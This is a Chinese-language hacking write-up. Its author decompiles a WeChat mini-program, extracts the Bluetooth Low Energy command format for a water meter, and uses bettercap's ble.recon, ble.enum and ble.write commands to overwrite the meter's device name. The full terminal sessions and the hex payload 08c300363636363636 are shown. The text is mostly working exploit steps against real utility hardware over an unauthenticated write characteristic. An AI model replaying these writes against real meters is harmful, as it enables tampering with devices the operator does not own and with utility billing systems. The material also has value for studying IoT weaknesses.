获取小程序的源码
我使用的是wxappUnpacker,但是在我写的时候已经在10天前就提交了rm分支上去。
- 但是master分支没有删除,所以我们还是可以恢复的。
先把wxappUnpacker的源码拉下来。
➜ bilibili git clone https://github.com/qwerty472123/wxappUnpacker
正克隆到 'wxappUnpacker'...
remote: Enumerating objects: 5, done.
remote: Counting objects: 100% (5/5), done.
remote: Compressing objects: 100% (3/3), done.
remote: Total 297 (delta 0), reused 3 (delta 0), pack-reused 292
接收对象中: 100% (297/297), 105.35 KiB | 168.00 KiB/s, 完成.
处理 delta 中: 100% (184/184), 完成.
- 切换分支到master,就可以看到多了很多文件了。
➜ wxappUnpacker git:(rm) git checkout master
- 照着README.md敲,缺什么包,安装什么包,执行几次依赖就能装好了。
npm install uglify-es
npm install js-beautify
npm install vm2
npm install esprima
npm install escodegen
npm install cssbeautify
npm install css-tree
- 把手机微信里的小程序文件拷到电脑,后缀名是wxapkg
执行node wuWxapkg.js 文件名进行解包
然后找到了一段测试代码
var i = new ArrayBuffer(9),
c = new DataView(i),
s = new Array(5),
a = e.data.deviceName;
a++, e.setData({
deviceName: a
}), s[5] = parseInt(a % 10) + 48, a /= 10, s[4] = parseInt(a % 10) + 48, a /= 10,
s[3] = parseInt(a % 10) + 48, a /= 10, s[2] = parseInt(a % 10) + 48, a /= 10, s[1] = parseInt(a % 10) + 48,
a /= 10, s[0] = parseInt(a) + 48, console.log(s);
var o = e.data.flow;
o++, o %= 256, o = parseInt(o), e.setData({
flow: o
}), c.setUint8(0, 8), c.setUint8(1, 195), c.setUint8(2, o), c.setUint8(3, s[0]),
c.setUint8(4, s[1]), c.setUint8(5, s[2]), c.setUint8(6, s[3]), c.setUint8(7, s[4]),
c.setUint8(8, s[5]), wx.writeBLECharacteristicValue({
deviceId: t.currentTarget.dataset.id,
serviceId: e.data.uuid,
characteristicId: e.data.characteristic_write_uuid,
value: i,
success: function (e) {
console.log("writeBLECharacteristicValue success: " + JSON.stringify(e));
}
});
然后自己写了一个小程序运行了一下试试,发现水表的设备名称被改了。
- 从上面的代码可以看出,第一位是8,第二位是195,第三位是o,也就是flow+1=251,第四位到第九位就是水表的设备名,拼接完后转16进制
- 虽然250很像是水表里的单价,但是我修改后并没有变,所以我也不知道是什么意思。
- serviceId:0000fee7-0000-1000-8000-00805f9b34fb
- characteristicId:0000fec7-0000-1000-8000-00805f9b34fb
如果要把水表的设备名称改为666666
Bluetooth Attribute Protocol
Opcode: Write Command (0x52)
0... .... = Authentication Signature: False
.1.. .... = Command: True
..01 0010 = Method: Write Request (0x12)
Handle: 0x0012 (Tencent Holdings Limited.: Apple, Inc.)
[Service UUID: Tencent Holdings Limited. (0xfee7)]
[UUID: Apple, Inc. (0xfec7)]
Value: 08 c3 00 36 36 36 36 36 36
- Value里的六个36就是6的16进制的ascii码
修改水表设备名称
- 手机修改可以使用nRF.Connect这个app,调试超级方便。
- 连接到蓝牙后,展开服务,点击characteristic为fec7上传按钮,复制刚刚的16进制字符串,点击发送就可以了。
- 电脑可以使用bettercap的ble.write发送
➜ wxappUnpacker git:(master) ✗ sudo bettercap
bettercap v2.26.1 (built for linux amd64 with go1.13.4) [type 'help' for a list of commands]
10.196.66.0/25 > 10.196.66.5 »
10.196.66.0/25 > 10.196.66.5 » ble.recon on
10.196.66.0/25 > 10.196.66.5 » [09:51:34] [ble.device.new] new BLE device detected as 7E:BD:F7:4B:93:A0 (Apple, Inc.) -82 dBm.
10.196.66.0/25 > 10.196.66.5 » [09:51:34] [ble.device.new] new BLE device detected as 3D:2B:6B:3C:9B:BE (Microsoft) -68 dBm.
10.196.66.0/25 > 10.196.66.5 » [09:51:34] [ble.device.new] new BLE device 777777 detected as 78:DB:2F:13:70:E6 (Fugoo, Inc.) -84 dBm.
10.196.66.0/25 > 10.196.66.5 » ble.show
┌─────────┬───────────────────┬─────────────┬──────────────────────────────────────────────┬─────────┬──────────┐
│ RSSI ▴ │ MAC │ Vendor │ Flags │ Connect │ Seen │
├─────────┼───────────────────┼─────────────┼──────────────────────────────────────────────┼─────────┼──────────┤
│ -73 dBm │ 3d:2b:6b:3c:9b:be │ Microsoft │ │ ✖ │ 09:51:42 │
│ -75 dBm │ 7e:bd:f7:4b:93:a0 │ Apple, Inc. │ LE + BR/EDR (controller), LE + BR/EDR (host) │ ✔ │ 09:51:42 │
│ -85 dBm │ 78:db:2f:13:70:e6 │ Fugoo, Inc. │ BR/EDR Not Supported │ ✔ │ 09:51:42 │
└─────────┴───────────────────┴─────────────┴──────────────────────────────────────────────┴─────────┴──────────┘
10.196.66.0/25 > 10.196.66.5 » ble.enum 78:DB:2F:13:70:E6
[09:51:59] [sys.log] [inf] ble.recon connecting to 78:db:2f:13:70:e6 ...
10.196.66.0/25 > 10.196.66.5 »
┌──────────────┬───────────────────────────────────────────────────────┬────────────┬─────────────────────────────────────────────────┐
│ Handles │ Service > Characteristics │ Properties │ Data │
├──────────────┼───────────────────────────────────────────────────────┼────────────┼─────────────────────────────────────────────────┤
│ 0001 -> 000b │ Generic Access (1800) │ │ │
│ 0003 │ Device Name (2a00) │ READ │ 777777 │
│ 0005 │ Appearance (2a01) │ READ │ Unknown │
│ 0007 │ Peripheral Privacy Flag (2a02) │ READ │ Privacy Disabled │
│ 0009 │ Reconnection Address (2a03) │ WRITE │ │
│ 000b │ Peripheral Preferred Connection Parameters (2a04) │ READ │ Connection Interval: 80 -> 160 │
│ │ │ │ Slave Latency: 0 │
│ │ │ │ Connection Supervision Timeout Multiplier: 1000 │
│ │ │ │ │
│ 000c -> 000f │ Generic Attribute (1801) │ │ │
│ 000e │ Service Changed (2a05) │ INDICATE │ │
│ │ │ │ │
│ 0010 -> ffff │ fee7 │ │ │
│ 0012 │ fec7 │ WRITE │ │
│ 0015 │ fec8 │ NOTIFY │ │
│ 0019 │ fec9 │ READ │ xÛ/13pæ │
│ │ │ │ │
└──────────────┴───────────────────────────────────────────────────────┴────────────┴─────────────────────────────────────────────────┘
10.196.66.0/25 > 10.196.66.5 » help ble.recon
ble.recon (running): Bluetooth Low Energy devices discovery.
ble.recon on : Start Bluetooth Low Energy devices discovery.
ble.recon off : Stop Bluetooth Low Energy devices discovery.
ble.clear : Clear all devices collected by the BLE discovery module.
ble.show : Show discovered Bluetooth Low Energy devices.
ble.enum MAC : Enumerate services and characteristics for the given BLE device.
ble.write MAC UUID HEX_DATA : Write the HEX_DATA buffer to the BLE device with the specified MAC address, to the characteristics with the given UUID.
Parameters
ble.device : Index of the HCI device to use, -1 to autodetect. (default=-1)
ble.show.filter : Defines a regular expression filter for ble.show (default=)
ble.show.limit : Defines limit for ble.show (default=0)
ble.show.sort : Defines sorting field (rssi, mac, seen) and direction (asc or desc) for ble.show (default=rssi asc)
ble.timeout : Connection timeout in seconds. (default=5)
ble.ttl : Seconds of inactivity for a device to be pruned. (default=30)
10.196.66.0/25 > 10.196.66.5 » ble.write 78:DB:2F:13:70:E6 fec7 08c300363636363636
[09:53:01] [sys.log] [inf] ble.recon connecting to 78:db:2f:13:70:e6 ...
10.196.66.0/25 > 10.196.66.5 » ble.enum 78:DB:2F:13:70:E6
[09:54:48] [sys.log] [inf] ble.recon connecting to 78:db:2f:13:70:e6 ...
10.196.66.0/25 > 10.196.66.5 »
┌──────────────┬───────────────────────────────────────────────────────┬────────────┬─────────────────────────────────────────────────┐
│ Handles │ Service > Characteristics │ Properties │ Data │
├──────────────┼───────────────────────────────────────────────────────┼────────────┼─────────────────────────────────────────────────┤
│ 0001 -> 000b │ Generic Access (1800) │ │ │
│ 0003 │ Device Name (2a00) │ READ │ 666666 │
│ 0005 │ Appearance (2a01) │ READ │ Unknown │
│ 0007 │ Peripheral Privacy Flag (2a02) │ READ │ Privacy Disabled │
│ 0009 │ Reconnection Address (2a03) │ WRITE │ │
│ 000b │ Peripheral Preferred Connection Parameters (2a04) │ READ │ Connection Interval: 80 -> 160 │
│ │ │ │ Slave Latency: 0 │
│ │ │ │ Connection Supervision Timeout Multiplier: 1000 │
│ │ │ │ │
│ 000c -> 000f │ Generic Attribute (1801) │ │ │
│ 000e │ Service Changed (2a05) │ INDICATE │ │
│ │ │ │ │
│ 0010 -> ffff │ fee7 │ │ │
│ 0012 │ fec7 │ WRITE │ │
│ 0015 │ fec8 │ NOTIFY │ │
│ 0019 │ fec9 │ READ │ xÛ/13pæ │
│ │ │ │ │
└──────────────┴───────────────────────────────────────────────────────┴────────────┴─────────────────────────────────────────────────┘